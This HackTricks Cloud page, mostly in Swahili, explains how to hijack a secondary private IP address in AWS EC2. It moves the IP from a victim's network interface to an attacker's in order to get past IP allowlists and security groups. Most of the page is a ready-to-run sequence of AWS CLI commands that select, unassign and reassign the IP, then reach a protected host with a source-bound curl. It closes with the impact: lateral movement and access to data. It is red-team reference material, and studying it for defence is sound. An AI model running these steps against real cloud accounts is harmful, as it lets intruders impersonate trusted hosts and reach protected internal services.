HackTricks CloudAWS – EC2 ENI Secondary Private IP Hijack (Trust/Allowlist Bypass)
Reading time: 4 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Tumia vibaya ec2:UnassignPrivateIpAddresses na ec2:AssignPrivateIpAddresses kuiba secondary private IP ya ENI ya mwathiriwa na kuhamisha kwa ENI ya mwavamizi katika subnet/AZ ileile. Huduma nyingi za ndani na security groups huweka ufikiaji kwa private IP maalum. Kwa kuhamisha anwani hiyo ya secondary, mwavamizi anajifanya kama mwenyeji aliyeaminika kwa L3 na anaweza kufikia allowlisted services.
Prereqs:
- Ruhusa:
ec2:DescribeNetworkInterfaces,ec2:UnassignPrivateIpAddresseskwenye ARN ya ENI ya mwathiriwa, naec2:AssignPrivateIpAddresseskwenye ARN ya ENI ya mwavamizi. - ENI zote mbili lazima ziwe katika subnet/AZ ileile. Anwani lengwa lazima iwe secondary IP (primary haiwezi kuondolewa).
Variables:
- REGION=us-east-1
- VICTIM_ENI=
- ATTACKER_ENI=
- PROTECTED_SG=
# SG on a target service that allows only $HIJACK_IP - PROTECTED_HOST=
Steps:
- Chagua secondary IP kutoka kwa ENI ya mwathiriwa
aws ec2 describe-network-interfaces --network-interface-ids $VICTIM_ENI --region $REGION --query NetworkInterfaces[0].PrivateIpAddresses[?Primary==`false`].PrivateIpAddress --output text | head -n1 | tee HIJACK_IP
export HIJACK_IP=$(cat HIJACK_IP)
- Hakikisha protected host inaruhusu IP hiyo tu (idempotent). Ikiwa unatumia SG-to-SG rules badala yake, ruka.
aws ec2 authorize-security-group-ingress --group-id $PROTECTED_SG --protocol tcp --port 80 --cidr "$HIJACK_IP/32" --region $REGION || true
- Msingi: kutoka kwenye instance ya mshambuliaji, ombi kwa PROTECTED_HOST inapaswa kushindikana bila chanzo kilichodanganywa (kwa mfano, kupitia SSM/SSH)
curl -sS --max-time 3 http://$PROTECTED_HOST || true
- Ondoa IP ya pili kutoka kwa ENI ya mwathiriwa
aws ec2 unassign-private-ip-addresses --network-interface-id $VICTIM_ENI --private-ip-addresses $HIJACK_IP --region $REGION
- Peana IP ile ile kwa attacker ENI (on AWS CLI v1 add
--allow-reassignment)
aws ec2 assign-private-ip-addresses --network-interface-id $ATTACKER_ENI --private-ip-addresses $HIJACK_IP --region $REGION
- Thibitisha umiliki umehamishwa
aws ec2 describe-network-interfaces --network-interface-ids $ATTACKER_ENI --region $REGION --query NetworkInterfaces[0].PrivateIpAddresses[].PrivateIpAddress --output text | grep -w $HIJACK_IP
- Kutoka kwa attacker instance, source-bind kwenye hijacked IP ili kufikia protected host (hakikisha IP imewekwa kwenye OS; ikiwa siyo, iiongeze kwa
ip addr add $HIJACK_IP/<mask> dev eth0)
curl --interface $HIJACK_IP -sS http://$PROTECTED_HOST -o /tmp/poc.out && head -c 80 /tmp/poc.out
Athari
- Kupita kando allowlists za IP na kujiga mwenyeji aliyeaminika ndani ya VPC kwa kuhamisha secondary private IPs kati ya ENIs ndani ya subnet/AZ ile ile.
- Kufikia huduma za ndani ambazo zinazuia upatikanaji kwa source IPs maalum, hivyo kuwezesha lateral movement na upatikanaji wa data.
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.